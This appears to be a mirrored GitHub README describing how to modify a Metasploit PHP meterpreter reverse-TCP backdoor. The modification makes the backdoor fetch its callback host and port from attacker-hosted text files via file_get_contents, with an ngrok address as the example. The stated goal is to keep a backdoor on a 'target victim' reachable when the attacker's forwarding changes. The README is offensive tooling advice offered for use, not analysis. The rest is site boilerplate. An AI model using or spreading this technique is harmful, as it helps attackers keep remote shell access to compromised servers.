Coder Social home page Coder Social logo

metasploit-payload-php-backdoor-func's Introduction

Metasploit-Payload-PHP-Backdoor-Func

metasploit payload 'php/meterpreter/reverse_tcp' file_get_content

look at line 4 through line 11, there you see the original source code on line 6 and line 7, and replace it like line 10 and line 11.

  • $ip = file_get_contents ("url");

  • $port = file_get_contents ("url");

Explanation: file_get_contents is to get the contents of the URL, so we create a file:

  • host.txt (contains "0.tcp.ngrok.io")

  • port.txt (contains "port", for example "13337")

and the file, uploaded to Hosting or Online storage.

Why use file_get_contents?

Because, when the backdoor is installed and used in the target victim, we cannot change the IP: Port, when Port Forwarding is down or experiencing problems, we only need to change the contents of the file host.txt and port.txt in Hosting or Online Storage, and backdoor in the target victim will read the new contents of the file, and therefore we can make it change as we wish.

metasploit-payload-php-backdoor-func's People

Contributors

warifp avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.